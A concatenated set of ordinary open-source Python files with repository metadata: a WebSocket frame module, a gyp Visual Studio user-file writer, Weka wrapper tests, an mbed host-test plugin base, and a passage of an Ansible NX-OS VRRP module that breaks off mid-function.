enqueue_op = queue.enqueue([prob_estimate])
queue_runner_impl.add_queue_runner(
queue_runner_impl.QueueRunner(queue, [enqueue_op] * 25))
out_tensor = queue.dequeue()
# Run the multi-threaded session.
with self.test_session() as sess:
# Need to initialize variables that keep running total of classes seen.
variables.global_variables_initializer().run()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(coord=coord)
for _ in range(25):
sess.run([out_tensor])
coord.request_stop()
coord.join(threads)
if __name__ == '__main__':
test.main()
| apache-2.0 |
andrewsy97/Treehacks | websocket/_abnf.py | 52 | 12382 | """
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
import six
import array
import struct
import os
from ._exceptions import *
from ._utils import validate_utf8
try:
# If wsaccel is available we use compiled routines to mask data.
from wsaccel.xormask import XorMaskerSimple
def _mask(_m, _d):
return XorMaskerSimple(_m).process(_d)
except ImportError:
# wsaccel is not available, we rely on python implementations.
def _mask(_m, _d):
for i in range(len(_d)):
_d[i] ^= _m[i % 4]
if six.PY3:
return _d.tobytes()
else:
return _d.tostring()
# closing frame status codes.
STATUS_NORMAL = 1000
STATUS_GOING_AWAY = 1001
STATUS_PROTOCOL_ERROR = 1002
STATUS_UNSUPPORTED_DATA_TYPE = 1003
STATUS_STATUS_NOT_AVAILABLE = 1005
STATUS_ABNORMAL_CLOSED = 1006
STATUS_INVALID_PAYLOAD = 1007
STATUS_POLICY_VIOLATION = 1008
STATUS_MESSAGE_TOO_BIG = 1009
STATUS_INVALID_EXTENSION = 1010
STATUS_UNEXPECTED_CONDITION = 1011
STATUS_TLS_HANDSHAKE_ERROR = 1015
VALID_CLOSE_STATUS = (
STATUS_NORMAL,
STATUS_GOING_AWAY,
STATUS_PROTOCOL_ERROR,
STATUS_UNSUPPORTED_DATA_TYPE,
STATUS_INVALID_PAYLOAD,
STATUS_POLICY_VIOLATION,
STATUS_MESSAGE_TOO_BIG,
STATUS_INVALID_EXTENSION,
STATUS_UNEXPECTED_CONDITION,
)
class ABNF(object):
"""
ABNF frame class.
see http://tools.ietf.org/html/rfc5234
and http://tools.ietf.org/html/rfc6455#section-5.2
"""
# operation code values.
OPCODE_CONT = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
# available operation code value tuple
OPCODES = (OPCODE_CONT, OPCODE_TEXT, OPCODE_BINARY, OPCODE_CLOSE,
OPCODE_PING, OPCODE_PONG)
# opcode human readable string
OPCODE_MAP = {
OPCODE_CONT: "cont",
OPCODE_TEXT: "text",
OPCODE_BINARY: "binary",
OPCODE_CLOSE: "close",
OPCODE_PING: "ping",
OPCODE_PONG: "pong"
}
# data length threshold.
LENGTH_7 = 0x7e
LENGTH_16 = 1 << 16
LENGTH_63 = 1 << 63
def __init__(self, fin=0, rsv1=0, rsv2=0, rsv3=0,
opcode=OPCODE_TEXT, mask=1, data=""):
"""
Constructor for ABNF.
please check RFC for arguments.
"""
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.mask = mask
if data == None:
data = ""
self.data = data
self.get_mask_key = os.urandom
def validate(self, skip_utf8_validation=False):
"""
validate the ABNF frame.
skip_utf8_validation: skip utf8 validation.
"""
if self.rsv1 or self.rsv2 or self.rsv3:
raise WebSocketProtocolException("rsv is not implemented, yet")
if self.opcode not in ABNF.OPCODES:
raise WebSocketProtocolException("Invalid opcode %r", self.opcode)
if self.opcode == ABNF.OPCODE_PING and not self.fin:
raise WebSocketProtocolException("Invalid ping frame.")
if self.opcode == ABNF.OPCODE_CLOSE:
l = len(self.data)
if not l:
return
if l == 1 or l >= 126:
raise WebSocketProtocolException("Invalid close frame.")
if l > 2 and not skip_utf8_validation and not validate_utf8(self.data[2:]):
raise WebSocketProtocolException("Invalid close frame.")
code = 256*six.byte2int(self.data[0:1]) + six.byte2int(self.data[1:2])
if not self._is_valid_close_status(code):
raise WebSocketProtocolException("Invalid close opcode.")
def _is_valid_close_status(self, code):
return code in VALID_CLOSE_STATUS or (3000 <= code <5000)
def __str__(self):
return "fin=" + str(self.fin) \
+ " opcode=" + str(self.opcode) \
+ " data=" + str(self.data)
@staticmethod
def create_frame(data, opcode, fin=1):
"""
create frame to send text, binary and other data.
data: data to send. This is string value(byte array).
if opcode is OPCODE_TEXT and this value is unicode,
data value is converted into unicode string, automatically.
opcode: operation code. please see OPCODE_XXX.
fin: fin flag. if set to 0, create continue fragmentation.
"""
if opcode == ABNF.OPCODE_TEXT and isinstance(data, six.text_type):
data = data.encode("utf-8")
# mask must be set if send data from client
return ABNF(fin, 0, 0, 0, opcode, 1, data)
def format(self):
"""
format this object to string(byte array) to send data to server.
"""
if any(x not in (0, 1) for x in [self.fin, self.rsv1, self.rsv2, self.rsv3]):
raise ValueError("not 0 or 1")
if self.opcode not in ABNF.OPCODES:
raise ValueError("Invalid OPCODE")
length = len(self.data)
if length >= ABNF.LENGTH_63:
raise ValueError("data is too long")
frame_header = chr(self.fin << 7
| self.rsv1 << 6 | self.rsv2 << 5 | self.rsv3 << 4
| self.opcode)
if length < ABNF.LENGTH_7:
frame_header += chr(self.mask << 7 | length)
frame_header = six.b(frame_header)
elif length < ABNF.LENGTH_16:
frame_header += chr(self.mask << 7 | 0x7e)
frame_header = six.b(frame_header)
frame_header += struct.pack("!H", length)
else:
frame_header += chr(self.mask << 7 | 0x7f)
frame_header = six.b(frame_header)
frame_header += struct.pack("!Q", length)
if not self.mask:
return frame_header + self.data
else:
mask_key = self.get_mask_key(4)
return frame_header + self._get_masked(mask_key)
def _get_masked(self, mask_key):
s = ABNF.mask(mask_key, self.data)
if isinstance(mask_key, six.text_type):
mask_key = mask_key.encode('utf-8')
return mask_key + s
@staticmethod
def mask(mask_key, data):
"""
mask or unmask data. Just do xor for each byte
mask_key: 4 byte string(byte).
data: data to mask/unmask.
"""
if data == None:
data = ""
if isinstance(mask_key, six.text_type):
mask_key = six.b(mask_key)
if isinstance(data, six.text_type):
data = six.b(data)
_m = array.array("B", mask_key)
_d = array.array("B", data)
return _mask(_m, _d)
class frame_buffer(object):
_HEADER_MASK_INDEX = 5
_HEADER_LENGHT_INDEX = 6
def __init__(self, recv_fn, skip_utf8_validation):
self.recv = recv_fn
self.skip_utf8_validation = skip_utf8_validation
# Buffers over the packets from the layer beneath until desired amount
# bytes of bytes are received.
self.recv_buffer = []
self.clear()
def clear(self):
self.header = None
self.length = None
self.mask = None
def has_received_header(self):
return self.header is None
def recv_header(self):
header = self.recv_strict(2)
b1 = header[0]
if six.PY2:
b1 = ord(b1)
fin = b1 >> 7 & 1
rsv1 = b1 >> 6 & 1
rsv2 = b1 >> 5 & 1
rsv3 = b1 >> 4 & 1
opcode = b1 & 0xf
b2 = header[1]
if six.PY2:
b2 = ord(b2)
has_mask = b2 >> 7 & 1
length_bits = b2 & 0x7f
self.header = (fin, rsv1, rsv2, rsv3, opcode, has_mask, length_bits)
def has_mask(self):
if not self.header:
return False
return self.header[frame_buffer._HEADER_MASK_INDEX]
def has_received_length(self):
return self.length is None
def recv_length(self):
bits = self.header[frame_buffer._HEADER_LENGHT_INDEX]
length_bits = bits & 0x7f
if length_bits == 0x7e:
v = self.recv_strict(2)
self.length = struct.unpack("!H", v)[0]
elif length_bits == 0x7f:
v = self.recv_strict(8)
self.length = struct.unpack("!Q", v)[0]
else:
self.length = length_bits
def has_received_mask(self):
return self.mask is None
def recv_mask(self):
self.mask = self.recv_strict(4) if self.has_mask() else ""
def recv_frame(self):
# Header
if self.has_received_header():
self.recv_header()
(fin, rsv1, rsv2, rsv3, opcode, has_mask, _) = self.header
# Frame length
if self.has_received_length():
self.recv_length()
length = self.length
# Mask
if self.has_received_mask():
self.recv_mask()
mask = self.mask
# Payload
payload = self.recv_strict(length)
if has_mask:
payload = ABNF.mask(mask, payload)
# Reset for next frame
self.clear()
frame = ABNF(fin, rsv1, rsv2, rsv3, opcode, has_mask, payload)
frame.validate(self.skip_utf8_validation)
return frame
def recv_strict(self, bufsize):
shortage = bufsize - sum(len(x) for x in self.recv_buffer)
while shortage > 0:
# Limit buffer size that we pass to socket.recv() to avoid
# fragmenting the heap -- the number of bytes recv() actually
# reads is limited by socket buffer and is relatively small,
# yet passing large numbers repeatedly causes lots of large
# buffers allocated and then shrunk, which results in fragmentation.
bytes = self.recv(min(16384, shortage))
self.recv_buffer.append(bytes)
shortage -= len(bytes)
unified = six.b("").join(self.recv_buffer)
if shortage == 0:
self.recv_buffer = []
return unified
else:
self.recv_buffer = [unified[bufsize:]]
return unified[:bufsize]
class continuous_frame(object):
def __init__(self, fire_cont_frame, skip_utf8_validation):
self.fire_cont_frame = fire_cont_frame
self.skip_utf8_validation = skip_utf8_validation
self.cont_data = None
self.recving_frames = None
def validate(self, frame):
if not self.recving_frames and frame.opcode == ABNF.OPCODE_CONT:
raise WebSocketProtocolException("Illegal frame")
if self.recving_frames and frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
raise WebSocketProtocolException("Illegal frame")
def add(self, frame):
if self.cont_data:
self.cont_data[1] += frame.data
else:
if frame.opcode in (ABNF.OPCODE_TEXT, ABNF.OPCODE_BINARY):
self.recving_frames = frame.opcode
self.cont_data = [frame.opcode, frame.data]
if frame.fin:
self.recving_frames = None
def is_fire(self, frame):
return frame.fin or self.fire_cont_frame
def extract(self, frame):
data = self.cont_data
self.cont_data = None
frame.data = data[1]
if not self.fire_cont_frame and data[0] == ABNF.OPCODE_TEXT and not self.skip_utf8_validation and not validate_utf8(frame.data):
raise WebSocketPayloadException("cannot decode: " + repr(frame.data))
return [data[0], frame]
| mit |
A-HostMobile/MobileApp | node_modules/node-gyp/gyp/pylib/gyp/MSVSUserFile.py | 2710 | 5094 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio user preferences file writer."""
import os
import re
import socket # for gethostname
import gyp.common
import gyp.easy_xml as easy_xml
#------------------------------------------------------------------------------
def _FindCommandInPath(command):
"""If there are no slashes in the command given, this function
searches the PATH env to find the given command, and converts it
to an absolute path. We have to do this because MSVS is looking
for an actual file to launch a debugger on, not just a command
line. Note that this happens at GYP time, so anything needing to
be built needs to have a full path."""
if '/' in command or '\\' in command:
# If the command already has path elements (either relative or
# absolute), then assume it is constructed properly.
return command
else:
# Search through the path list and find an existing file that
# we can access.
paths = os.environ.get('PATH','').split(os.pathsep)
for path in paths:
item = os.path.join(path, command)
if os.path.isfile(item) and os.access(item, os.X_OK):
return item
return command
def _QuoteWin32CommandLineArgs(args):
new_args = []
for arg in args:
# Replace all double-quotes with double-double-quotes to escape
# them for cmd shell, and then quote the whole thing if there
# are any.
if arg.find('"') != -1:
arg = '""'.join(arg.split('"'))
arg = '"%s"' % arg
# Otherwise, if there are any spaces, quote the whole arg.
elif re.search(r'[ \t\n]', arg):
arg = '"%s"' % arg
new_args.append(arg)
return new_args
class Writer(object):
"""Visual Studio XML user user file writer."""
def __init__(self, user_file_path, version, name):
"""Initializes the user file.
Args:
user_file_path: Path to the user file.
version: Version info.
name: Name of the user file.
"""
self.user_file_path = user_file_path
self.version = version
self.name = name
self.configurations = {}
def AddConfig(self, name):
"""Adds a configuration to the project.
Args:
name: Configuration name.
"""
self.configurations[name] = ['Configuration', {'Name': name}]
def AddDebugSettings(self, config_name, command, environment = {},
working_directory=""):
"""Adds a DebugSettings node to the user file for a particular config.
Args:
command: command line to run. First element in the list is the
executable. All elements of the command will be quoted if
necessary.
working_directory: other files which may trigger the rule. (optional)
"""
command = _QuoteWin32CommandLineArgs(command)
abs_command = _FindCommandInPath(command[0])
if environment and isinstance(environment, dict):
env_list = ['%s="%s"' % (key, val)
for (key,val) in environment.iteritems()]
environment = ' '.join(env_list)
else:
environment = ''
n_cmd = ['DebugSettings',
{'Command': abs_command,
'WorkingDirectory': working_directory,
'CommandArguments': " ".join(command[1:]),
'RemoteMachine': socket.gethostname(),
'Environment': environment,
'EnvironmentMerge': 'true',
# Currently these are all "dummy" values that we're just setting
# in the default manner that MSVS does it. We could use some of
# these to add additional capabilities, I suppose, but they might
# not have parity with other platforms then.
'Attach': 'false',
'DebuggerType': '3', # 'auto' debugger
'Remote': '1',
'RemoteCommand': '',
'HttpUrl': '',
'PDBPath': '',
'SQLDebugging': '',
'DebuggerFlavor': '0',
'MPIRunCommand': '',
'MPIRunArguments': '',
'MPIRunWorkingDirectory': '',
'ApplicationCommand': '',
'ApplicationArguments': '',
'ShimCommand': '',
'MPIAcceptMode': '',
'MPIAcceptFilter': ''
}]
# Find the config, and add it if it doesn't exist.
if config_name not in self.configurations:
self.AddConfig(config_name)
# Add the DebugSettings onto the appropriate config.
self.configurations[config_name].append(n_cmd)
def WriteIfChanged(self):
"""Writes the user file."""
configs = ['Configurations']
for config, spec in sorted(self.configurations.iteritems()):
configs.append(spec)
content = ['VisualStudioUserFile',
{'Version': self.version.ProjectVersion(),
'Name': self.name
},
configs]
easy_xml.WriteXmlIfChanged(content, self.user_file_path,
encoding="Windows-1252")
| apache-2.0 |
fracpete/python-weka-wrapper | tests/wekatests/experiments.py | 2 | 8264 | # This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# experiments.py
# Copyright (C) 2014-2018 Fracpete (pythonwekawrapper at gmail dot com)
import unittest
import weka.core.jvm as jvm
import weka.core.converters as converters
import weka.experiments as experiments
import weka.classifiers as classifiers
import wekatests.tests.weka_test as weka_test
class TestExperiments(weka_test.WekaTest):
def test_crossvalidation_classification(self):
"""
Tests cross-validated classification.
"""
datasets = [self.datafile("iris.arff"), self.datafile("anneal.arff")]
cls = [
classifiers.Classifier(classname="weka.classifiers.rules.ZeroR"),
classifiers.Classifier(classname="weka.classifiers.trees.J48")]
outfile = self.tempfile("results-cv.arff")
exp = experiments.SimpleCrossValidationExperiment(
classification=True,
runs=10,
folds=10,
datasets=datasets,
classifiers=cls,
result=outfile)
self.assertIsNotNone(exp, msg="Failed to instantiate!")
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
self.assertIsNotNone(data, msg="Failed to load data: " + outfile)
matrix = experiments.ResultMatrix(classname="weka.experiment.ResultMatrixPlainText")
self.assertIsNotNone(matrix, msg="Failed to instantiate!")
tester = experiments.Tester(classname="weka.experiment.PairedCorrectedTTester")
self.assertIsNotNone(tester, msg="Failed to instantiate!")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Percent_correct").index
tester.instances = data
self.assertGreater(len(tester.header(comparison_col)), 0, msg="Generated no header")
self.assertGreater(len(tester.multi_resultset_full(0, comparison_col)), 0, msg="Generated no result")
def test_randomsplit_regression(self):
"""
Tests random split on regression.
"""
datasets = [self.datafile("bolts.arff"), self.datafile("bodyfat.arff")]
cls = [
classifiers.Classifier(classname="weka.classifiers.rules.ZeroR"),
classifiers.Classifier(classname="weka.classifiers.functions.LinearRegression")
]
outfile = self.tempfile("results-rs.arff")
exp = experiments.SimpleRandomSplitExperiment(
classification=False,
runs=10,
percentage=66.6,
preserve_order=False,
datasets=datasets,
classifiers=cls,
result=outfile)
self.assertIsNotNone(exp, msg="Failed to instantiate!")
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
self.assertIsNotNone(data, msg="Failed to load data: " + outfile)
matrix = experiments.ResultMatrix(classname="weka.experiment.ResultMatrixPlainText")
self.assertIsNotNone(matrix, msg="Failed to instantiate!")
tester = experiments.Tester(classname="weka.experiment.PairedCorrectedTTester")
self.assertIsNotNone(tester, msg="Failed to instantiate!")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Correlation_coefficient").index
tester.instances = data
self.assertGreater(len(tester.header(comparison_col)), 0, msg="Generated no header")
self.assertGreater(len(tester.multi_resultset_full(0, comparison_col)), 0, msg="Generated no result")
def test_result_matrix(self):
"""
Tests the ResultMatrix class.
"""
datasets = [self.datafile("iris.arff"), self.datafile("anneal.arff")]
cls = [
classifiers.Classifier(classname="weka.classifiers.rules.ZeroR"),
classifiers.Classifier(classname="weka.classifiers.trees.J48")]
outfile = self.tempfile("results-cv.arff")
exp = experiments.SimpleCrossValidationExperiment(
classification=True,
runs=10,
folds=10,
datasets=datasets,
classifiers=cls,
result=outfile)
self.assertIsNotNone(exp, msg="Failed to instantiate!")
exp.setup()
exp.run()
# evaluate
loader = converters.loader_for_file(outfile)
data = loader.load_file(outfile)
self.assertIsNotNone(data, msg="Failed to load data: " + outfile)
matrix = experiments.ResultMatrix(classname="weka.experiment.ResultMatrixPlainText")
self.assertIsNotNone(matrix, msg="Failed to instantiate!")
tester = experiments.Tester(classname="weka.experiment.PairedCorrectedTTester")
self.assertIsNotNone(tester, msg="Failed to instantiate!")
tester.resultmatrix = matrix
comparison_col = data.attribute_by_name("Percent_correct").index
tester.instances = data
self.assertGreater(len(tester.header(comparison_col)), 0, msg="Generated no header")
self.assertGreater(len(tester.multi_resultset_full(0, comparison_col)), 0, msg="Generated no result")
# dimensions
self.assertEqual(2, matrix.rows, msg="# of rows differ")
self.assertEqual(2, matrix.columns, msg="# of rows differ")
# cols
#self.assertTrue(matrix.get_col_name(0).find("ZeroR") > -1, msg="ZeroR should be part of col name")
#self.assertTrue(matrix.get_col_name(1).find("J48") > -1, msg="J48 should be part of col name")
#self.assertIsNone(matrix.get_col_name(2), msg="Column name should not exist")
#matrix.set_col_name(0, "zeror")
#self.assertTrue(matrix.get_col_name(0).find("zeror") > -1, msg="zeror should be part of col name")
self.assertFalse(matrix.is_col_hidden(1), msg="Column should be visible")
matrix.hide_col(1)
self.assertTrue(matrix.is_col_hidden(1), msg="Column should be hidden")
matrix.show_col(1)
self.assertFalse(matrix.is_col_hidden(1), msg="Column should be visible again")
# rows
#self.assertEqual("iris", matrix.get_row_name(0), msg="Row names differ")
#self.assertEqual("anneal", matrix.get_row_name(1), msg="Row names differ")
#self.assertIsNone(matrix.get_col_name(2), msg="Row name should not exist")
#matrix.set_row_name(0, "IRIS")
#self.assertEqual("IRIS", matrix.get_row_name(0), msg="Row names differ")
self.assertFalse(matrix.is_row_hidden(1), msg="Row should be visible")
matrix.hide_row(1)
self.assertTrue(matrix.is_row_hidden(1), msg="Row should be hidden")
matrix.show_row(1)
self.assertFalse(matrix.is_row_hidden(1), msg="Row should be visible again")
# mean
self.assertAlmostEqual(33.3, matrix.get_mean(0, 0), places=1, msg="Means differ")
self.assertAlmostEqual(54.75, matrix.average(0), places=2, msg="Averages differ")
matrix.set_mean(0, 0, 10)
self.assertAlmostEqual(10.0, matrix.get_mean(0, 0), places=1, msg="Means differ")
# stdev
self.assertAlmostEqual(0.0, matrix.get_stdev(0, 0), places=1, msg="Means differ")
matrix.set_stdev(0, 0, 0.3)
self.assertAlmostEqual(0.3, matrix.get_stdev(0, 0), places=1, msg="Means differ")
def suite():
"""
Returns the test suite.
:return: the test suite
:rtype: unittest.TestSuite
"""
return unittest.TestLoader().loadTestsFromTestCase(TestExperiments)
if __name__ == '__main__':
jvm.start()
unittest.TextTestRunner().run(suite())
jvm.stop()
| gpl-3.0 |
j-greffe/mbed-os | tools/host_tests/host_tests_plugins/host_test_plugins.py | 92 | 4881 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from os import access, F_OK
from sys import stdout
from time import sleep
from subprocess import call
class HostTestPluginBase:
""" Base class for all plug-ins used with host tests.
"""
###########################################################################
# Interface:
###########################################################################
###########################################################################
# Interface attributes defining plugin name, type etc.
###########################################################################
name = "HostTestPluginBase" # Plugin name, can be plugin class name
type = "BasePlugin" # Plugin type: ResetMethod, Copymethod etc.
capabilities = [] # Capabilities names: what plugin can achieve
# (e.g. reset using some external command line tool)
stable = False # Determine if plugin is stable and can be used
###########################################################################
# Interface methods
###########################################################################
def setup(self, *args, **kwargs):
""" Configure plugin, this function should be called before plugin execute() method is used.
"""
return False
def execute(self, capabilitity, *args, **kwargs):
""" Executes capability by name.
Each capability e.g. may directly just call some command line
program or execute building pythonic function
"""
return False
###########################################################################
# Interface helper methods - overload only if you need to have custom behaviour
###########################################################################
def print_plugin_error(self, text):
""" Function prints error in console and exits always with False
"""
print "Plugin error: %s::%s: %s"% (self.name, self.type, text)
return False
def print_plugin_info(self, text, NL=True):
""" Function prints notification in console and exits always with True
"""
if NL:
print "Plugin info: %s::%s: %s"% (self.name, self.type, text)
else:
print "Plugin info: %s::%s: %s"% (self.name, self.type, text),
return True
def print_plugin_char(self, char):
""" Function prints char on stdout
"""
stdout.write(char)
stdout.flush()
return True
def check_mount_point_ready(self, destination_disk, init_delay=0.2, loop_delay=0.25):
""" Checks if destination_disk is ready and can be accessed by e.g. copy commands
@init_delay - Initial delay time before first access check
@loop_delay - pooling delay for access check
"""
if not access(destination_disk, F_OK):
self.print_plugin_info("Waiting for mount point '%s' to be ready..."% destination_disk, NL=False)
sleep(init_delay)
while not access(destination_disk, F_OK):
sleep(loop_delay)
self.print_plugin_char('.')
def check_parameters(self, capabilitity, *args, **kwargs):
""" This function should be ran each time we call execute()
to check if none of the required parameters is missing.
"""
missing_parameters = []
for parameter in self.required_parameters:
if parameter not in kwargs:
missing_parameters.append(parameter)
if len(missing_parameters) > 0:
self.print_plugin_error("execute parameter(s) '%s' missing!"% (', '.join(parameter)))
return False
return True
def run_command(self, cmd, shell=True):
""" Runs command from command line.
"""
result = True
ret = 0
try:
ret = call(cmd, shell=shell)
if ret:
self.print_plugin_error("[ret=%d] Command: %s"% (int(ret), cmd))
return False
except Exception as e:
result = False
self.print_plugin_error("[ret=%d] Command: %s"% (int(ret), cmd))
self.print_plugin_error(str(e))
return result
| apache-2.0 |
walbert947/ansible-modules-core | network/nxos/nxos_vrrp.py | 10 | 13515 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: nxos_vrrp
version_added: "2.1"
short_description: Manages VRRP configuration on NX-OS switches
description:
- Manages VRRP configuration on NX-OS switches
extends_documentation_fragment: nxos
author: Jason Edelman (@jedelman8), Gabriele Gerbino (@GGabriele)
notes:
- VRRP feature needs to be enabled first on the system
- SVIs must exist before using this module
- Interface must be a L3 port before using this module
- state=absent removes the vrrp group if it exists on the device
- VRRP cannot be configured on loopback interfaces
options:
group:
description:
- vrrp group number
required: true
interface:
description:
- Full name of interface that is being managed for vrrp
required: true
priority:
description:
- vrrp priority
required: false
default: null
vip:
description:
- hsrp virtual IP address
required: false
default: null
authentication:
description:
- clear text authentication string
required: false
default: null
state:
description:
- Specify desired state of the resource
required: false
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ensure vrrp group 100 and vip 10.1.100.1 is on vlan10
- nxos_vrrp: interface=vlan10 group=100 vip=10.1.100.1 host={{ inventory_hostname }}
# ensure removal of the vrrp group config # vip is required to ensure the user knows what they are removing
- nxos_vrrp: interface=vlan10 group=100 vip=10.1.100.1 state=absent host={{ inventory_hostname }}
# re-config with more params
- nxos_vrrp: interface=vlan10 group=100 vip=10.1.100.1 preempt=false priority=130 authentication=AUTHKEY host={{ inventory_hostname }}
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"authentication": "testing", "group": "150", "vip": "10.1.15.1"}
existing:
description: k/v pairs of existing vrrp info on the interface
type: dict
sample: {}
end_state:
description: k/v pairs of vrrp after module execution
returned: always
type: dict
sample: {"authentication": "testing", "group": "150", "interval": "1",
"preempt": true, "priority": "100", "vip": "10.1.15.1"}
state:
description: state as sent in from the playbook
returned: always
type: string
sample: "present"
updates:
description: commands sent to the device
returned: always
type: list
sample: ["interface vlan10", "vrrp 150", "address 10.1.15.1",
"authentication text testing"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
def execute_config_command(commands, module):
try:
module.configure(commands)
except ShellError, clie:
module.fail_json(msg='Error sending CLI commands',
error=str(clie), commands=commands)
def get_cli_body_ssh_vrrp(command, response, module):
"""Get response for when transport=cli. This is kind of a hack and mainly
needed because these modules were originally written for NX-API. And
not every command supports "| json" when using cli/ssh. As such, we assume
if | json returns an XML string, it is a valid command, but that the
resource doesn't exist yet. Instead, the output will be a raw string
when issuing commands containing 'show run'.
"""
if 'xml' in response[0]:
body = []
elif 'show run' in command:
body = response
else:
try:
response = response[0].replace(command + '\n\n', '').strip()
body = [json.loads(response)]
except ValueError:
module.fail_json(msg='Command does not support JSON output',
command=command)
return body
def execute_show(cmds, module, command_type=None):
try:
if command_type:
response = module.execute(cmds, command_type=command_type)
else:
response = module.execute(cmds)
except ShellError, clie:
module.fail_json(msg='Error sending {0}'.format(command),
error=str(clie))
return response
def execute_show_command(command, module, command_type='cli_show'):
if module.params['transport'] == 'cli':
command += ' | json'
cmds = [command]
response = execute_show(cmds, module)
body = get_cli_body_ssh_vrrp(command, response, module)
elif module.params['transport'] == 'nxapi':
cmds = [command]
body = execute_show(cmds, module, command_type=command_type)
return body
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
def get_interface_type(interface):
if interface.upper().startswith('ET'):
return 'ethernet'
elif interface.upper().startswith('VL'):
return 'svi'
elif interface.upper().startswith('LO'):
return 'loopback'
elif interface.upper().startswith('MG'):
return 'management'
elif interface.upper().startswith('MA'):
return 'management'
elif interface.upper().startswith('PO'):
return 'portchannel'
else:
return 'unknown'
def is_default(interface, module):
command = 'show run interface {0}'.format(interface)
try:
body = execute_show_command(command, module)[0]
if 'invalid' in body.lower():
return 'DNE'
else:
raw_list = body.split('\n')
if raw_list[-1].startswith('interface'):
return True
else:
return False
except (KeyError):
return 'DNE'
def get_interface_mode(interface, intf_type, module):
command = 'show interface {0}'.format(interface)
interface = {}
mode = 'unknown'
if intf_type in ['ethernet', 'portchannel']:
body = execute_show_command(command, module)[0]
interface_table = body['TABLE_interface']['ROW_interface']
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode == 'access' or mode == 'trunk':
mode = 'layer2'
elif intf_type == 'svi':
mode = 'layer3'
return mode
def get_existing_vrrp(interface, group, module):
command = 'show vrrp detail interface {0}'.format(interface)
body = execute_show_command(command, module)
vrrp = {}
vrrp_key = {
'sh_group_id': 'group',
'sh_vip_addr': 'vip',
'sh_priority': 'priority',
'sh_group_preempt': 'preempt',
'sh_auth_text': 'authentication',
'sh_adv_interval': 'interval'
}
try:
vrrp_table = body[0]['TABLE_vrrp_group']
except (AttributeError, IndexError, TypeError):
return {}
if isinstance(vrrp_table, dict):
vrrp_table = [vrrp_table]
for each_vrrp in vrrp_table:
vrrp_row = each_vrrp['ROW_vrrp_group']
parsed_vrrp = apply_key_map(vrrp_key, vrrp_row)
if parsed_vrrp['preempt'] == 'Disable':
parsed_vrrp['preempt'] = False
elif parsed_vrrp['preempt'] == 'Enable':
parsed_vrrp['preempt'] = True
if parsed_vrrp['group'] == group:
return parsed_vrrp
return vrrp
def get_commands_config_vrrp(delta, group):
commands = []
CMDS = {
'priority': 'priority {0}',
'preempt': 'preempt',
'vip': 'address {0}',
'interval': 'advertisement-interval {0}',
'auth': 'authentication text {0}'
}
vip = delta.get('vip')
priority = delta.get('priority')
preempt = delta.get('preempt')
interval = delta.get('interval')
auth = delta.get('authentication')
if vip:
commands.append((CMDS.get('vip')).format(vip))
if priority:
commands.append((CMDS.get('priority')).format(priority))
if preempt:
commands.append(CMDS.get('preempt'))
elif preempt is False:
commands.append('no ' + CMDS.get('preempt'))
if interval:
commands.append((CMDS.get('interval')).format(interval))
if auth:
commands.append((CMDS.get('auth')).format(auth))
commands.insert(0, 'vrrp {0}'.format(group))
return commands
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def validate_params(param, module):
value = module.params[param]
if param == 'group':
try:
if (int(value) < 1 or int(value) > 255):
raise ValueError
except ValueError:
